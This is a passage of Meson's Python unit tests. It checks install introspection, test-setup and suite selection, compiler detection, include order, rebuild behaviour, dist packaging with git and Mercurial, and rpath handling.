testdir = os.path.join(self.common_test_dir, '54 run target')
self.init(testdir)
self.run_target('check_exists')
def test_install_introspection(self):
'''
Tests that the Meson introspection API exposes install filenames correctly
https://github.com/mesonbuild/meson/issues/829
'''
if self.backend is not Backend.ninja:
raise unittest.SkipTest('{!r} backend can\'t install files'.format(self.backend.name))
testdir = os.path.join(self.common_test_dir, '8 install')
self.init(testdir)
intro = self.introspect('--targets')
if intro[0]['type'] == 'executable':
intro = intro[::-1]
self.assertPathListEqual(intro[0]['install_filename'], ['/usr/lib/libstat.a'])
self.assertPathListEqual(intro[1]['install_filename'], ['/usr/bin/prog' + exe_suffix])
def test_install_subdir_introspection(self):
'''
Test that the Meson introspection API also contains subdir install information
https://github.com/mesonbuild/meson/issues/5556
'''
testdir = os.path.join(self.common_test_dir, '62 install subdir')
self.init(testdir)
intro = self.introspect('--installed')
expected = {
'sub2': 'share/sub2',
'subdir/sub1': 'share/sub1',
'subdir/sub_elided': 'share',
'sub1': 'share/sub1',
'sub/sub1': 'share/sub1',
'sub_elided': 'share',
'nested_elided/sub': 'share',
}
self.assertEqual(len(intro), len(expected))
# Convert expected to PurePath
expected_converted = {PurePath(os.path.join(testdir, key)): PurePath(os.path.join(self.prefix, val)) for key, val in expected.items()}
intro_converted = {PurePath(key): PurePath(val) for key, val in intro.items()}
for src, dst in expected_converted.items():
self.assertIn(src, intro_converted)
self.assertEqual(dst, intro_converted[src])
def test_install_introspection_multiple_outputs(self):
'''
Tests that the Meson introspection API exposes multiple install filenames correctly without crashing
https://github.com/mesonbuild/meson/pull/4555
Reverted to the first file only because of https://github.com/mesonbuild/meson/pull/4547#discussion_r244173438
TODO Change the format to a list officially in a followup PR
'''
if self.backend is not Backend.ninja:
raise unittest.SkipTest('{!r} backend can\'t install files'.format(self.backend.name))
testdir = os.path.join(self.common_test_dir, '144 custom target multiple outputs')
self.init(testdir)
intro = self.introspect('--targets')
if intro[0]['type'] == 'executable':
intro = intro[::-1]
self.assertPathListEqual(intro[0]['install_filename'], ['/usr/include/diff.h', '/usr/bin/diff.sh'])
self.assertPathListEqual(intro[1]['install_filename'], ['/opt/same.h', '/opt/same.sh'])
self.assertPathListEqual(intro[2]['install_filename'], ['/usr/include/first.h', None])
self.assertPathListEqual(intro[3]['install_filename'], [None, '/usr/bin/second.sh'])
def test_install_log_content(self):
'''
Tests that the install-log.txt is consistent with the installed files and directories.
Specifically checks that the log file only contains one entry per file/directory.
https://github.com/mesonbuild/meson/issues/4499
'''
testdir = os.path.join(self.common_test_dir, '62 install subdir')
self.init(testdir)
self.install()
installpath = Path(self.installdir)
# Find installed files and directories
expected = {installpath: 0}
for name in installpath.rglob('*'):
expected[name] = 0
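# Map every installed path to an entry count; the log must mention each
# path exactly once and nothing else.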
# Find logged files and directories
with Path(self.builddir, 'meson-logs', 'install-log.txt').open() as f:
logged = [Path(line.strip()) for line in f
if not line.startswith('#')]
for name in logged:
self.assertIn(name, expected, 'Log contains extra entry {}'.format(name))
expected[name] += 1
for name, count in expected.items():
self.assertGreater(count, 0, 'Log is missing entry for {}'.format(name))
self.assertLess(count, 2, 'Log has multiple entries for {}'.format(name))
def test_uninstall(self):
exename = os.path.join(self.installdir, 'usr/bin/prog' + exe_suffix)
testdir = os.path.join(self.common_test_dir, '8 install')
self.init(testdir)
self.assertPathDoesNotExist(exename)
self.install()
self.assertPathExists(exename)
self.uninstall()
self.assertPathDoesNotExist(exename)
def test_forcefallback(self):
testdir = os.path.join(self.unit_test_dir, '31 forcefallback')
self.init(testdir, extra_args=['--wrap-mode=forcefallback'])
self.build()
self.run_tests()
def test_env_ops_dont_stack(self):
'''
Test that env ops prepend/append do not stack, and that this usage issues a warning
'''
testdir = os.path.join(self.unit_test_dir, '63 test env does not stack')
out = self.init(testdir)
self.assertRegex(out, r'WARNING: Overriding.*TEST_VAR_APPEND')
self.assertRegex(out, r'WARNING: Overriding.*TEST_VAR_PREPEND')
self.assertNotRegex(out, r'WARNING: Overriding.*TEST_VAR_SET')
self.run_tests()
def test_testsetups(self):
if not shutil.which('valgrind'):
raise unittest.SkipTest('Valgrind not installed.')
testdir = os.path.join(self.unit_test_dir, '2 testsetups')
self.init(testdir)
self.build()
# Run tests without setup
self.run_tests()
with open(os.path.join(self.logdir, 'testlog.txt')) as f:
basic_log = f.read()
# Run the buggy test with a setup whose env makes it fail
self.assertRaises(subprocess.CalledProcessError,
self._run, self.mtest_command + ['--setup=valgrind'])
with open(os.path.join(self.logdir, 'testlog-valgrind.txt')) as f:
vg_log = f.read()
self.assertNotIn('TEST_ENV is set', basic_log)
self.assertNotIn('Memcheck', basic_log)
self.assertIn('TEST_ENV is set', vg_log)
self.assertIn('Memcheck', vg_log)
# Run the buggy test with a setup that has no env, so it passes
self._run(self.mtest_command + ['--setup=wrapper'])
# Setup with no properties works
self._run(self.mtest_command + ['--setup=empty'])
# Setup with only env works
self._run(self.mtest_command + ['--setup=onlyenv'])
self._run(self.mtest_command + ['--setup=onlyenv2'])
self._run(self.mtest_command + ['--setup=onlyenv3'])
# Setup with only a timeout works
self._run(self.mtest_command + ['--setup=timeout'])
def test_testsetup_selection(self):
testdir = os.path.join(self.unit_test_dir, '14 testsetup selection')
self.init(testdir)
self.build()
# Run tests without setup
self.run_tests()
self.assertRaises(subprocess.CalledProcessError, self._run, self.mtest_command + ['--setup=missingfromfoo'])
self._run(self.mtest_command + ['--setup=missingfromfoo', '--no-suite=foo:'])
self._run(self.mtest_command + ['--setup=worksforall'])
self._run(self.mtest_command + ['--setup=main:worksforall'])
self.assertRaises(subprocess.CalledProcessError, self._run,
self.mtest_command + ['--setup=onlyinbar'])
self.assertRaises(subprocess.CalledProcessError, self._run,
self.mtest_command + ['--setup=onlyinbar', '--no-suite=main:'])
self._run(self.mtest_command + ['--setup=onlyinbar', '--no-suite=main:', '--no-suite=foo:'])
self._run(self.mtest_command + ['--setup=bar:onlyinbar'])
self.assertRaises(subprocess.CalledProcessError, self._run,
self.mtest_command + ['--setup=foo:onlyinbar'])
self.assertRaises(subprocess.CalledProcessError, self._run,
self.mtest_command + ['--setup=main:onlyinbar'])
def test_testsetup_default(self):
testdir = os.path.join(self.unit_test_dir, '49 testsetup default')
self.init(testdir)
self.build()
# Running tests without --setup causes the default setup to be used
self.run_tests()
with open(os.path.join(self.logdir, 'testlog.txt')) as f:
default_log = f.read()
# Run tests explicitly using the same setup that is set as the default
self._run(self.mtest_command + ['--setup=mydefault'])
with open(os.path.join(self.logdir, 'testlog-mydefault.txt')) as f:
mydefault_log = f.read()
# Run tests with another setup
self._run(self.mtest_command + ['--setup=other'])
with open(os.path.join(self.logdir, 'testlog-other.txt')) as f:
other_log = f.read()
self.assertIn('ENV_A is 1', default_log)
self.assertIn('ENV_B is 2', default_log)
self.assertIn('ENV_C is 2', default_log)
self.assertIn('ENV_A is 1', mydefault_log)
self.assertIn('ENV_B is 2', mydefault_log)
self.assertIn('ENV_C is 2', mydefault_log)
self.assertIn('ENV_A is 1', other_log)
self.assertIn('ENV_B is 3', other_log)
self.assertIn('ENV_C is 2', other_log)
def assertFailedTestCount(self, failure_count, command):
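# 'meson test' uses the number of failed tests as its exit status, so the
# CalledProcessError returncode doubles as the failure count.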
try:
self._run(command)
self.assertEqual(0, failure_count, 'Expected %d tests to fail.' % failure_count)
except subprocess.CalledProcessError as e:
self.assertEqual(e.returncode, failure_count)
def test_suite_selection(self):
testdir = os.path.join(self.unit_test_dir, '4 suite selection')
self.init(testdir)
self.build()
self.assertFailedTestCount(4, self.mtest_command)
self.assertFailedTestCount(0, self.mtest_command + ['--suite', ':success'])
self.assertFailedTestCount(3, self.mtest_command + ['--suite', ':fail'])
self.assertFailedTestCount(4, self.mtest_command + ['--no-suite', ':success'])
self.assertFailedTestCount(1, self.mtest_command + ['--no-suite', ':fail'])
self.assertFailedTestCount(1, self.mtest_command + ['--suite', 'mainprj'])
self.assertFailedTestCount(0, self.mtest_command + ['--suite', 'subprjsucc'])
self.assertFailedTestCount(1, self.mtest_command + ['--suite', 'subprjfail'])
self.assertFailedTestCount(1, self.mtest_command + ['--suite', 'subprjmix'])
self.assertFailedTestCount(3, self.mtest_command + ['--no-suite', 'mainprj'])
self.assertFailedTestCount(4, self.mtest_command + ['--no-suite', 'subprjsucc'])
self.assertFailedTestCount(3, self.mtest_command + ['--no-suite', 'subprjfail'])
self.assertFailedTestCount(3, self.mtest_command + ['--no-suite', 'subprjmix'])
self.assertFailedTestCount(1, self.mtest_command + ['--suite', 'mainprj:fail'])
self.assertFailedTestCount(0, self.mtest_command + ['--suite', 'mainprj:success'])
self.assertFailedTestCount(3, self.mtest_command + ['--no-suite', 'mainprj:fail'])
self.assertFailedTestCount(4, self.mtest_command + ['--no-suite', 'mainprj:success'])
self.assertFailedTestCount(1, self.mtest_command + ['--suite', 'subprjfail:fail'])
self.assertFailedTestCount(0, self.mtest_command + ['--suite', 'subprjfail:success'])
self.assertFailedTestCount(3, self.mtest_command + ['--no-suite', 'subprjfail:fail'])
self.assertFailedTestCount(4, self.mtest_command + ['--no-suite', 'subprjfail:success'])
self.assertFailedTestCount(0, self.mtest_command + ['--suite', 'subprjsucc:fail'])
self.assertFailedTestCount(0, self.mtest_command + ['--suite', 'subprjsucc:success'])
self.assertFailedTestCount(4, self.mtest_command + ['--no-suite', 'subprjsucc:fail'])
self.assertFailedTestCount(4, self.mtest_command + ['--no-suite', 'subprjsucc:success'])
self.assertFailedTestCount(1, self.mtest_command + ['--suite', 'subprjmix:fail'])
self.assertFailedTestCount(0, self.mtest_command + ['--suite', 'subprjmix:success'])
self.assertFailedTestCount(3, self.mtest_command + ['--no-suite', 'subprjmix:fail'])
self.assertFailedTestCount(4, self.mtest_command + ['--no-suite', 'subprjmix:success'])
self.assertFailedTestCount(2, self.mtest_command + ['--suite', 'subprjfail', '--suite', 'subprjmix:fail'])
self.assertFailedTestCount(3, self.mtest_command + ['--suite', 'subprjfail', '--suite', 'subprjmix', '--suite', 'mainprj'])
self.assertFailedTestCount(2, self.mtest_command + ['--suite', 'subprjfail', '--suite', 'subprjmix', '--suite', 'mainprj', '--no-suite', 'subprjmix:fail'])
self.assertFailedTestCount(1, self.mtest_command + ['--suite', 'subprjfail', '--suite', 'subprjmix', '--suite', 'mainprj', '--no-suite', 'subprjmix:fail', 'mainprj-failing_test'])
self.assertFailedTestCount(2, self.mtest_command + ['--no-suite', 'subprjfail:fail', '--no-suite', 'subprjmix:fail'])
def test_build_by_default(self):
testdir = os.path.join(self.common_test_dir, '133 build by default')
self.init(testdir)
self.build()
genfile1 = os.path.join(self.builddir, 'generated1.dat')
genfile2 = os.path.join(self.builddir, 'generated2.dat')
exe1 = os.path.join(self.builddir, 'fooprog' + exe_suffix)
exe2 = os.path.join(self.builddir, 'barprog' + exe_suffix)
self.assertPathExists(genfile1)
self.assertPathExists(genfile2)
self.assertPathDoesNotExist(exe1)
self.assertPathDoesNotExist(exe2)
self.build(target=('fooprog' + exe_suffix))
self.assertPathExists(exe1)
self.build(target=('barprog' + exe_suffix))
self.assertPathExists(exe2)
def test_internal_include_order(self):
testdir = os.path.join(self.common_test_dir, '134 include order')
self.init(testdir)
execmd = fxecmd = None
for cmd in self.get_compdb():
if 'someexe' in cmd['command']:
execmd = cmd['command']
continue
if 'somefxe' in cmd['command']:
fxecmd = cmd['command']
continue
if not execmd or not fxecmd:
raise Exception('Could not find someexe and somefxe commands')
# Check include order for 'someexe'
incs = [a for a in split_args(execmd) if a.startswith("-I")]
self.assertEqual(len(incs), 9)
# target private dir
someexe_id = Target.construct_id_from_path("sub4", "someexe", "@exe")
self.assertPathEqual(incs[0], "-I" + os.path.join("sub4", someexe_id))
# target build subdir
self.assertPathEqual(incs[1], "-Isub4")
# target source subdir
self.assertPathBasenameEqual(incs[2], 'sub4')
# include paths added via per-target c_args: ['-I'...]
self.assertPathBasenameEqual(incs[3], 'sub3')
# target include_directories: build dir
self.assertPathEqual(incs[4], "-Isub2")
# target include_directories: source dir
self.assertPathBasenameEqual(incs[5], 'sub2')
# target internal dependency include_directories: build dir
self.assertPathEqual(incs[6], "-Isub1")
# target internal dependency include_directories: source dir
self.assertPathBasenameEqual(incs[7], 'sub1')
# custom target include dir
self.assertPathEqual(incs[8], '-Ictsub')
# Check include order for 'somefxe'
incs = [a for a in split_args(fxecmd) if a.startswith('-I')]
self.assertEqual(len(incs), 9)
# target private dir
self.assertPathEqual(incs[0], '-Isomefxe@exe')
# target build dir
self.assertPathEqual(incs[1], '-I.')
# target source dir
self.assertPathBasenameEqual(incs[2], os.path.basename(testdir))
# target internal dependency correct include_directories: build dir
self.assertPathEqual(incs[3], "-Isub4")
# target internal dependency correct include_directories: source dir
self.assertPathBasenameEqual(incs[4], 'sub4')
# target internal dependency dep include_directories: build dir
self.assertPathEqual(incs[5], "-Isub1")
# target internal dependency dep include_directories: source dir
self.assertPathBasenameEqual(incs[6], 'sub1')
# target internal dependency wrong include_directories: build dir
self.assertPathEqual(incs[7], "-Isub2")
# target internal dependency wrong include_directories: source dir
self.assertPathBasenameEqual(incs[8], 'sub2')
def test_compiler_detection(self):
'''
Test that automatic compiler detection and setting from the environment
both work just fine. This is needed because while running project tests
and other unit tests, we always read CC/CXX/etc from the environment.
'''
gnu = mesonbuild.compilers.GnuCompiler
clang = mesonbuild.compilers.ClangCompiler
intel = mesonbuild.compilers.IntelGnuLikeCompiler
msvc = (mesonbuild.compilers.VisualStudioCCompiler, mesonbuild.compilers.VisualStudioCPPCompiler)
clangcl = (mesonbuild.compilers.ClangClCCompiler, mesonbuild.compilers.ClangClCPPCompiler)
ar = mesonbuild.linkers.ArLinker
lib = mesonbuild.linkers.VisualStudioLinker
langs = [('c', 'CC'), ('cpp', 'CXX')]
if not is_windows() and platform.machine().lower() != 'e2k':
langs += [('objc', 'OBJC'), ('objcpp', 'OBJCXX')]
testdir = os.path.join(self.unit_test_dir, '5 compiler detection')
env = get_fake_env(testdir, self.builddir, self.prefix)
for lang, evar in langs:
# Detect with evar and do sanity checks on that
if evar in os.environ:
ecc = getattr(env, 'detect_{}_compiler'.format(lang))(MachineChoice.HOST)
self.assertTrue(ecc.version)
elinker = env.detect_static_linker(ecc)
# Pop it so we don't use it for the next detection
evalue = os.environ.pop(evar)
# Very rough/strict heuristics. Would never work for actual
# compiler detection, but should be ok for the tests.
ebase = os.path.basename(evalue)
if ebase.startswith('g') or ebase.endswith(('-gcc', '-g++')):
self.assertIsInstance(ecc, gnu)
self.assertIsInstance(elinker, ar)
elif 'clang-cl' in ebase:
self.assertIsInstance(ecc, clangcl)
self.assertIsInstance(elinker, lib)
elif 'clang' in ebase:
self.assertIsInstance(ecc, clang)
self.assertIsInstance(elinker, ar)
elif ebase.startswith('ic'):
self.assertIsInstance(ecc, intel)
self.assertIsInstance(elinker, ar)
elif ebase.startswith('cl'):
self.assertIsInstance(ecc, msvc)
self.assertIsInstance(elinker, lib)
else:
raise AssertionError('Unknown compiler {!r}'.format(evalue))
# Check that we actually used the evalue correctly as the compiler
self.assertEqual(ecc.get_exelist(), split_args(evalue))
# Do auto-detection of compiler based on platform, PATH, etc.
cc = getattr(env, 'detect_{}_compiler'.format(lang))(MachineChoice.HOST)
self.assertTrue(cc.version)
linker = env.detect_static_linker(cc)
# Check compiler type
if isinstance(cc, gnu):
self.assertIsInstance(linker, ar)
if is_osx():
self.assertIsInstance(cc.linker, mesonbuild.linkers.AppleDynamicLinker)
else:
self.assertIsInstance(cc.linker, mesonbuild.linkers.GnuLikeDynamicLinkerMixin)
if isinstance(cc, clangcl):
self.assertIsInstance(linker, lib)
self.assertIsInstance(cc.linker, mesonbuild.linkers.ClangClDynamicLinker)
if isinstance(cc, clang):
self.assertIsInstance(linker, ar)
if is_osx():
self.assertIsInstance(cc.linker, mesonbuild.linkers.AppleDynamicLinker)
elif is_windows():
# This is clang, not clang-cl
self.assertIsInstance(cc.linker, mesonbuild.linkers.MSVCDynamicLinker)
else:
self.assertIsInstance(cc.linker, mesonbuild.linkers.GnuLikeDynamicLinkerMixin)
if isinstance(cc, intel):
self.assertIsInstance(linker, ar)
if is_osx():
self.assertIsInstance(cc.linker, mesonbuild.linkers.AppleDynamicLinker)
elif is_windows():
self.assertIsInstance(cc.linker, mesonbuild.linkers.XilinkDynamicLinker)
else:
self.assertIsInstance(cc.linker, mesonbuild.linkers.GnuDynamicLinker)
if isinstance(cc, msvc):
self.assertTrue(is_windows())
self.assertIsInstance(linker, lib)
self.assertEqual(cc.id, 'msvc')
self.assertTrue(hasattr(cc, 'is_64'))
self.assertIsInstance(cc.linker, mesonbuild.linkers.MSVCDynamicLinker)
# If we're on Windows CI, we know what the compiler will be
if 'arch' in os.environ:
if os.environ['arch'] == 'x64':
self.assertTrue(cc.is_64)
else:
self.assertFalse(cc.is_64)
# Set evar ourselves to a wrapper script that just calls the same
# exelist + some argument. This is meant to test that setting
# something like `ccache gcc -pipe` or `distcc ccache gcc` works.
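# (roughly equivalent to exporting CC="ccache gcc -DSOME_ARG" before
# configuring, with a Python script standing in for ccache)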
wrapper = os.path.join(testdir, 'compiler wrapper.py')
wrappercc = python_command + [wrapper] + cc.get_exelist() + ['-DSOME_ARG']
wrappercc_s = ' '.join(quote_arg(w) for w in wrappercc)
os.environ[evar] = wrappercc_s
wcc = getattr(env, 'detect_{}_compiler'.format(lang))(MachineChoice.HOST)
# Check static linker too
wrapperlinker = python_command + [wrapper] + linker.get_exelist() + linker.get_always_args()
wrapperlinker_s = ' '.join(quote_arg(w) for w in wrapperlinker)
os.environ['AR'] = wrapperlinker_s
wlinker = env.detect_static_linker(wcc)
# Pop it so we don't use it for the next detection
evalue = os.environ.pop('AR')
# Must be the same type since it's a wrapper around the same exelist
self.assertIs(type(cc), type(wcc))
self.assertIs(type(linker), type(wlinker))
# Ensure that the exelist is correct
self.assertEqual(wcc.get_exelist(), wrappercc)
self.assertEqual(wlinker.get_exelist(), wrapperlinker)
# Ensure that the version detection worked correctly
self.assertEqual(cc.version, wcc.version)
if hasattr(cc, 'is_64'):
self.assertEqual(cc.is_64, wcc.is_64)
def test_always_prefer_c_compiler_for_asm(self):
testdir = os.path.join(self.common_test_dir, '137 c cpp and asm')
# Skip if building with MSVC
env = get_fake_env(testdir, self.builddir, self.prefix)
if env.detect_c_compiler(MachineChoice.HOST).get_id() == 'msvc':
raise unittest.SkipTest('MSVC can\'t compile assembly')
self.init(testdir)
commands = {'c-asm': {}, 'cpp-asm': {}, 'cpp-c-asm': {}, 'c-cpp-asm': {}}
for cmd in self.get_compdb():
# Get compiler
split = split_args(cmd['command'])
if split[0] == 'ccache':
compiler = split[1]
else:
compiler = split[0]
# Classify commands
if 'Ic-asm' in cmd['command']:
if cmd['file'].endswith('.S'):
commands['c-asm']['asm'] = compiler
elif cmd['file'].endswith('.c'):
commands['c-asm']['c'] = compiler
else:
raise AssertionError('{!r} found in c-asm?'.format(cmd['command']))
elif 'Icpp-asm' in cmd['command']:
if cmd['file'].endswith('.S'):
commands['cpp-asm']['asm'] = compiler
elif cmd['file'].endswith('.cpp'):
commands['cpp-asm']['cpp'] = compiler
else:
raise AssertionError('{!r} found in cpp-asm?'.format(cmd['command']))
elif 'Ic-cpp-asm' in cmd['command']:
if cmd['file'].endswith('.S'):
commands['c-cpp-asm']['asm'] = compiler
elif cmd['file'].endswith('.c'):
commands['c-cpp-asm']['c'] = compiler
elif cmd['file'].endswith('.cpp'):
commands['c-cpp-asm']['cpp'] = compiler
else:
raise AssertionError('{!r} found in c-cpp-asm?'.format(cmd['command']))
elif 'Icpp-c-asm' in cmd['command']:
if cmd['file'].endswith('.S'):
commands['cpp-c-asm']['asm'] = compiler
elif cmd['file'].endswith('.c'):
commands['cpp-c-asm']['c'] = compiler
elif cmd['file'].endswith('.cpp'):
commands['cpp-c-asm']['cpp'] = compiler
else:
raise AssertionError('{!r} found in cpp-c-asm?'.format(cmd['command']))
else:
raise AssertionError('Unknown command {!r} found'.format(cmd['command']))
# Check that .S files are always built with the C compiler
self.assertEqual(commands['c-asm']['asm'], commands['c-asm']['c'])
self.assertEqual(commands['c-asm']['asm'], commands['cpp-asm']['asm'])
self.assertEqual(commands['cpp-asm']['asm'], commands['c-cpp-asm']['c'])
self.assertEqual(commands['c-cpp-asm']['asm'], commands['c-cpp-asm']['c'])
self.assertEqual(commands['cpp-c-asm']['asm'], commands['cpp-c-asm']['c'])
self.assertNotEqual(commands['cpp-asm']['asm'], commands['cpp-asm']['cpp'])
self.assertNotEqual(commands['c-cpp-asm']['c'], commands['c-cpp-asm']['cpp'])
self.assertNotEqual(commands['cpp-c-asm']['c'], commands['cpp-c-asm']['cpp'])
# Check that the c-asm target is always linked with the C linker
build_ninja = os.path.join(self.builddir, 'build.ninja')
with open(build_ninja, 'r', encoding='utf-8') as f:
contents = f.read()
m = re.search('build c-asm.*: c_LINKER', contents)
self.assertIsNotNone(m, msg=contents)
def test_preprocessor_checks_CPPFLAGS(self):
'''
Test that preprocessor compiler checks read CPPFLAGS and also CFLAGS but
not LDFLAGS.
'''
testdir = os.path.join(self.common_test_dir, '136 get define')
define = 'MESON_TEST_DEFINE_VALUE'
# NOTE: this list can't have \n, ' or "
# \n is never substituted by the GNU pre-processor via a -D define
# ' and " confuse split_args() even when they are escaped
# % and # confuse the MSVC preprocessor
# !, ^, *, and < confuse lcc preprocessor
value = 'spaces and fun@$&()-=_+{}[]:;>?,./~`'
for env_var in ['CPPFLAGS', 'CFLAGS']:
env = {}
env[env_var] = '-D{}="{}"'.format(define, value)
env['LDFLAGS'] = '-DMESON_FAIL_VALUE=cflags-read'
self.init(testdir, extra_args=['-D{}={}'.format(define, value)], override_envvars=env)
def test_custom_target_exe_data_deterministic(self):
testdir = os.path.join(self.common_test_dir, '113 custom target capture')
self.init(testdir)
meson_exe_dat1 = glob(os.path.join(self.privatedir, 'meson_exe*.dat'))
self.wipe()
self.init(testdir)
meson_exe_dat2 = glob(os.path.join(self.privatedir, 'meson_exe*.dat'))
self.assertListEqual(meson_exe_dat1, meson_exe_dat2)
def test_noop_changes_cause_no_rebuilds(self):
'''
Test that no-op changes to the build files, such as mtime updates, do
not cause a rebuild of anything.
'''
testdir = os.path.join(self.common_test_dir, '6 linkshared')
self.init(testdir)
self.build()
# Immediately rebuilding should not do anything
self.assertBuildIsNoop()
# Changing mtime of meson.build should not rebuild anything
self.utime(os.path.join(testdir, 'meson.build'))
self.assertReconfiguredBuildIsNoop()
# Changing mtime of libfile.c should rebuild the library, but not relink the executable
self.utime(os.path.join(testdir, 'libfile.c'))
self.assertBuildRelinkedOnlyTarget('mylib')
def test_source_changes_cause_rebuild(self):
'''
Test that changes to sources and headers cause rebuilds, but not
changes to unused files (as determined by the dependency file) in the
input files list.
'''
testdir = os.path.join(self.common_test_dir, '20 header in file list')
self.init(testdir)
self.build()
# Immediately rebuilding should not do anything
self.assertBuildIsNoop()
# Changing mtime of header.h should rebuild everything
self.utime(os.path.join(testdir, 'header.h'))
self.assertBuildRelinkedOnlyTarget('prog')
def test_custom_target_changes_cause_rebuild(self):
'''
Test that in a custom target, changes to the input files, the
ExternalProgram, and any File objects on the command-line cause
a rebuild.
'''
testdir = os.path.join(self.common_test_dir, '60 custom header generator')
self.init(testdir)
self.build()
# Immediately rebuilding should not do anything
self.assertBuildIsNoop()
# Changing mtime of these should rebuild everything
for f in ('input.def', 'makeheader.py', 'somefile.txt'):
self.utime(os.path.join(testdir, f))
self.assertBuildRelinkedOnlyTarget('prog')
def test_source_generator_program_cause_rebuild(self):
'''
Test that changes to generator programs in the source tree cause
a rebuild.
'''
testdir = os.path.join(self.common_test_dir, '94 gen extra')
self.init(testdir)
self.build()
# Immediately rebuilding should not do anything
self.assertBuildIsNoop()
# Changing mtime of generator should rebuild the executable
self.utime(os.path.join(testdir, 'srcgen.py'))
self.assertRebuiltTarget('basic')
def test_static_library_lto(self):
'''
Test that static libraries can be built with LTO and linked to
executables. On Linux, this requires the use of gcc-ar.
https://github.com/mesonbuild/meson/issues/1646
'''
testdir = os.path.join(self.common_test_dir, '5 linkstatic')
env = get_fake_env(testdir, self.builddir, self.prefix)
if env.detect_c_compiler(MachineChoice.HOST).get_id() == 'clang' and is_windows():
raise unittest.SkipTest('LTO not (yet) supported by windows clang')
self.init(testdir, extra_args='-Db_lto=true')
self.build()
self.run_tests()
def test_dist_git(self):
if not shutil.which('git'):
raise unittest.SkipTest('Git not found')
if self.backend is not Backend.ninja:
raise unittest.SkipTest('Dist is only supported with Ninja')
try:
self.dist_impl(_git_init)
except PermissionError:
# When run under Windows CI, something (virus scanner?)
# holds on to the git files so cleaning up the dir
# fails sometimes.
pass
def test_dist_hg(self):
if not shutil.which('hg'):
raise unittest.SkipTest('Mercurial not found')
if self.backend is not Backend.ninja:
raise unittest.SkipTest('Dist is only supported with Ninja')
def hg_init(project_dir):
subprocess.check_call(['hg', 'init'], cwd=project_dir)
with open(os.path.join(project_dir, '.hg', 'hgrc'), 'w') as f:
print('[ui]', file=f)
print('username=Author Person <teh_coderz@example.com>', file=f)
subprocess.check_call(['hg', 'add', 'meson.build', 'distexe.c'], cwd=project_dir)
subprocess.check_call(['hg', 'commit', '-m', 'I am a project'], cwd=project_dir)
try:
self.dist_impl(hg_init, include_subprojects=False)
except PermissionError:
# When run under Windows CI, something (virus scanner?)
# holds on to the hg files so cleaning up the dir
# fails sometimes.
pass
def test_dist_git_script(self):
if not shutil.which('git'):
raise unittest.SkipTest('Git not found')
if self.backend is not Backend.ninja:
raise unittest.SkipTest('Dist is only supported with Ninja')
try:
with tempfile.TemporaryDirectory() as tmpdir:
project_dir = os.path.join(tmpdir, 'a')
shutil.copytree(os.path.join(self.unit_test_dir, '35 dist script'),
project_dir)
_git_init(project_dir)
self.init(project_dir)
self.build('dist')
except PermissionError:
# When run under Windows CI, something (virus scanner?)
# holds on to the git files so cleaning up the dir
# fails sometimes.
pass
def create_dummy_subproject(self, project_dir, name):
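# Create a minimal subproject containing only a project() call.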
path = os.path.join(project_dir, 'subprojects', name)
os.makedirs(path)
with open(os.path.join(path, 'meson.build'), 'w') as ofile:
ofile.write("project('{}')".format(name))
return path
def dist_impl(self, vcs_init, include_subprojects=True):
# Create this on the fly because having rogue .git directories inside
# the source tree leads to all kinds of trouble.
with tempfile.TemporaryDirectory() as project_dir:
with open(os.path.join(project_dir, 'meson.build'), 'w') as ofile:
ofile.write('''project('disttest', 'c', version : '1.4.3')
e = executable('distexe', 'distexe.c')
test('dist test', e)
subproject('vcssub', required : false)
subproject('tarballsub', required : false)
''')
with open(os.path.join(project_dir, 'distexe.c'), 'w') as ofile:
ofile.write('''#include<stdio.h>
int main(int argc, char **argv) {
printf("I am a distribution test.\\n");
return 0;
}
''')
xz_distfile = os.path.join(self.distdir, 'disttest-1.4.3.tar.xz')
xz_checksumfile = xz_distfile + '.sha256sum'
zip_distfile = os.path.join(self.distdir, 'disttest-1.4.3.zip')
zip_checksumfile = zip_distfile + '.sha256sum'
vcs_init(project_dir)
if include_subprojects:
vcs_init(self.create_dummy_subproject(project_dir, 'vcssub'))
self.create_dummy_subproject(project_dir, 'tarballsub')
self.create_dummy_subproject(project_dir, 'unusedsub')
self.init(project_dir)
self.build('dist')
self.assertPathExists(xz_distfile)
self.assertPathExists(xz_checksumfile)
self.assertPathDoesNotExist(zip_distfile)
self.assertPathDoesNotExist(zip_checksumfile)
self._run(self.meson_command + ['dist', '--formats', 'zip'],
workdir=self.builddir)
self.assertPathExists(zip_distfile)
self.assertPathExists(zip_checksumfile)
if include_subprojects:
z = zipfile.ZipFile(zip_distfile)
self.assertEqual(sorted(['disttest-1.4.3/',
'disttest-1.4.3/meson.build',
'disttest-1.4.3/distexe.c']),
sorted(z.namelist()))
self._run(self.meson_command + ['dist', '--formats', 'zip', '--include-subprojects'],
workdir=self.builddir)
z = zipfile.ZipFile(zip_distfile)
self.assertEqual(sorted(['disttest-1.4.3/',
'disttest-1.4.3/subprojects/',
'disttest-1.4.3/meson.build',
'disttest-1.4.3/distexe.c',
'disttest-1.4.3/subprojects/tarballsub/',
'disttest-1.4.3/subprojects/vcssub/',
'disttest-1.4.3/subprojects/tarballsub/meson.build',
'disttest-1.4.3/subprojects/vcssub/meson.build']),
sorted(z.namelist()))
def test_rpath_uses_ORIGIN(self):
'''
Test that built targets use $ORIGIN in rpath, which ensures that they
are relocatable and ensures that builds are reproducible since the
build directory won't get embedded into the built binaries.
'''
if is_windows() or is_cygwin():
raise unittest.SkipTest('Windows PE/COFF binaries do not use RPATH')
testdir = os.path.join(self.common_test_dir, '42 library chain')
self.init(testdir)
self.build()
for each in ('prog', 'subdir/liblib1.so', ):
rpath = get_rpath(os.path.join(self.builddir, each))
self.assertTrue(rpath, 'Rpath could not be determined for {}.'.format(each))
if is_dragonflybsd():
# DragonflyBSD will prepend /usr/lib/gccVERSION to the rpath,
# so ignore that.
self.assertTrue(rpath.startswith('/usr/lib/gcc'))
rpaths = rpath.split(':')[1:]
else:
rpaths = rpath.split(':')
for path in rpaths:
self.assertTrue(path.startswith('$ORIGIN'), msg=(each, path))
# These two don't link to anything else, so they do not need an rpath entry.
for each in ('subdir/subdir2/liblib2.so', 'subdir/subdir3/liblib3.so'):
rpath = get_rpath(os.path.join(self.builddir, each))
if is_dragonflybsd():
# The rpath should be equal to /usr/lib/gccVERSION
self.assertTrue(rpath.startswith('/usr/lib/gcc'))
self.assertEqual(len(rpath.split(':')), 1)
else:
self.assertIsNone(rpath)
def test_dash_d_dedup(self):
testdir = os.path.join(self.unit_test_dir, '9 d dedup')
self.init(testdir)
cmd = self.get_compdb()[0]['command']
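# Accept GCC-style -D and MSVC-style /D spellings, quoted or unquoted.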
self.assertTrue('-D FOO -D BAR' in cmd or
